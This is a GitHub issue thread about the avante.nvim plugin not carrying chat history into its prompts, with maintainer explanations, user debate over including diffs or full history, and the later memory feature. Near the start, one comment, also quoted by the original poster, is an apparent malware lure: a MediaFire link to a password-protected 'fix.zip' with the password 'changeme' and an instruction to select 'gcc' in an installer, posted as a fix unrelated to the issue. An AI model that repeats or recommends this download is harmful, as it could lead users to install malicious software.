### ISSUE TITLE
No remembering conversation

### ISSUE THREAD

**Issue by chgara** [yetone/avante.nvim#239] opened 2024-08-26 12:14 UTC
When executing command AvanteAsk it seems to not remember the conversation previously had. Event when entering a new message right after the response is given.

I dont know if it is a bug or it is intended to be like this.

It is happening me with the copilot provider.

Also for more context, when writting a new message it deletes from the UI all the previous ones, and you can't access them untill you close and reopen the avante var.

https://github.com/user-attachments/assets/c82b654d-bf30-45bc-8dd9-133cc30d4c73

**Comment by chgara** [comment] 2024-08-26 12:20
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

What is it?

**Comment by haohaohaoadsad** [comment] 2024-08-26 12:31
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aarnphm** [comment] 2024-08-26 12:37
I don't think so, we haven't implement context for chat history yet.

**Comment by chgara** [comment] 2024-08-26 12:55
Ahh, ok, thanks, could be a cool feature, thanks.

**Comment by aarnphm** [comment] 2024-08-26 13:06
It saves chat history, those are orthogonal

**Comment by chgara** [comment] 2024-08-27 22:11
> When executing command AvanteAsk it seems to not remember the conversation previously had. Event when entering a new message right after the response is given.
> 
> I dont know if it is a bug or it is intended to be like this.
> 
> It is happening me with the copilot provider.
> 
> Also for more context, when writting a new message it deletes from the UI all the previous ones, and you can't access them untill you close and reopen the avante var.
> 
>  2024-08-26.13-58-18.mp4

Sorry. surely it is my bad, but I do not understand.

I do not understand the term "orthogonal", what it means.

Also, so there is no case where currently the plugin is using chat for context, so if i write a message and the put another it cant remember the old one?

Thkns

**Comment by aarnphm** [comment] 2024-08-27 22:44
1. the only functionality of chat history is persistent history, meaning you can access previously generated code from given LLM to a given buffer.

2. You are asking to include the chat history into the context of the prompt. Currently avante doesn't do this, yet. This is due to adding chat context, which will only increase context windows, and in the past, when I experimented with this, it didn't seem to improve the generation quality at all.

Though I do see the point of having chat context to improve on llm suggestion iteratively. Therefore, 1. and 2. are orthogonal, not directly relational. this is a case of "it is not a bug, but a feature"

@yetone I was thinking about this for a bit, how about we only include the generated diff as chat context? Seems like all of the other generated text are not that necessary for the prompt.

**Comment by MCodes96** [comment] 2024-08-28 09:20
> @yetone I was thinking about this for a bit, how about we only include the generated diff as chat context? Seems like all of the other generated text are not that necessary for the prompt.
@aarnphm Maybe add a config option so the user can decide. Should be trivial to implement if the default setting will be only diffs. I'm fine with "wasting" more tokens if that gives me the ability to reference everything claude's been saying in that conversation and him not halucinating.

**Comment by pidgeon777** [comment] 2024-08-28 12:38
Perhaps this function could be added as a user-configurable option?

**Comment by aarnphm** [comment] 2024-08-28 15:58
i'm also fine with gating this behind options

**Comment by stordahl** [comment] 2024-08-28 22:03
Agreed that this should be configurable

**Comment by aarnphm** [comment] 2024-08-28 22:37
discussed offline with @yetone, we will include only the generated diff as context, as explanation are not needed.

**Comment by AdamDorwart** [comment] 2024-08-29 20:05
I think I would still want the ability to send the entire context (configurable is fine). Sometimes it is genuinely useful to refer back to conversational topics related to requirements, or reaffirm what was a mistake. Only including the diffs will strip useful context and could confuse the LLM more.

**Comment by MCodes96** [comment] 2024-08-29 20:18
> I think I would still want the ability to send the entire context (configurable is fine). Sometimes it is genuinely useful to refer back to conversational topics related to requirements, or reaffirm what was a mistake. Only including the diffs will strip useful context and could confuse the LLM more.

I agree but of course it's up to @yetone to decide.

**Comment by aarnphm** [comment] 2024-08-29 20:34
I'm fine either way, i just think the reasoning from llm currently would just lead to even more halucination (we will have to agree to disagree here).

At the end of the day I see this as a prompt engineering problem.

**Comment by jcd13d** [comment] 2024-08-29 22:47
FWIW I feel like I get better results iterating with Claude in their UI than in the Avante plug-in window. I think it's because of chat history. 

Having configurable # of previous messages to include would be a nice feature, with the option to include all previous chats.

I will say after a long conversation the model does degrade in performance when I use the claude web app. So an option to erase history for a file might be nice as well.

**Comment by aarnphm** [comment] 2024-08-30 00:00
you can already do that with `/clear`

**Comment by UncleGravity** [comment] 2024-09-03 03:22
IMO chat context is extremely useful.  It's a bit strange to see "chat" everywhere and then only be able to send a single message.

For older LLMs maybe it was a bigger problem, but for things like sonnet 3.5, if I'm not feeding it my entire codebase then it follows multi step conversations just fine.

I think the chat pane should show one conversation at at time, while having a "session" select menu somewhere, much like Cursor/Zed.

**Comment by mattpetters** [comment] 2024-09-18 21:27
so I forked and made a branch where I did a rough hack implementation to make avante a bit more usable for my day-to-day, just wanted to comment here and check in because I know some other tangential features are in flight (project context etc).

I think this issue and https://github.com/yetone/avante.nvim/issues/76 are somewhat addressed by my changes. I'm happy to polish them up/finish them if you guys think it aligns with where you see the project going.

Basically:
1. `/hist` will show the chat history for the "session" (what I'm calling it) in the event that buffer gets cleared
2. I changed `getFilename` for the history file to be 1) the name of the git root dir OR 2) just the filename if not in a git dir.
3) Working on a "/hist all" command which is super jank right now but my thoughts is some kind of selection UI to browse previous chats **of all time** (whatever is on disk) kinda like the claude UX online.
4) not sending any extra context along just yet but was about to implement including the entire "session" context on each request so Avante doesn't get memory wiped every time

Thoughts, criticisms, etc open to all of it! This tool rocks and I want it to be better than Cursor for the nvim community ;)

@yetone

**Comment by mattpetters** [comment] 2024-09-26 19:13
I think this is resolved now actually with the new repo map stuff!

**Comment by netmute** [comment] 2024-10-27 15:05
The new Claude version is quite impressive. But it is occasionally asking follow up questions, that I have absolutely no way of responding to in Avante right now.

**Comment by eyalk11** [comment] 2024-11-03 02:49
It should be prioritized, I think. It is a basic feature.

**Comment by pidgeon777** [comment] 2024-11-03 13:11
> I think this is resolved now actually with the new repo map stuff!

I'm curious to know what you're referring to.

**Comment by aarnphm** [comment] 2024-11-04 04:43
This is for continous adding context previous sent chat log in the same file.

we are working on a memory feature atm, stay tuned

**Closed** 2024-11-04 08:20 UTC
Labels: new feature

**Comment by yetone** [comment] 2024-11-04 11:24
‌‌This feature is already available in the latest version of avante.nvim, and everyone is welcome to try it out.

**Comment by pidgeon777** [comment] 2024-11-04 12:36
> ‌‌This feature is already available in the latest version of avante.nvim, and everyone is welcome to try it out.

It is enabled bu default? If yes, which would be the differences compared to the unimplemented version?

**Comment by yetone** [comment] 2024-11-04 16:47
> > ‌‌This feature is already available in the latest version of avante.nvim, and everyone is welcome to try it out.
> 
> 
> 
> It is enabled bu default? If yes, which would be the differences compared to the unimplemented version?

Yes, memory is turned on by default, and you can test to see if the memory function is working correctly by using the following:

You send a message saying "Your future replies must be in Japanese", and then do a series of follow-up chats to see if it comes back in Japanese.
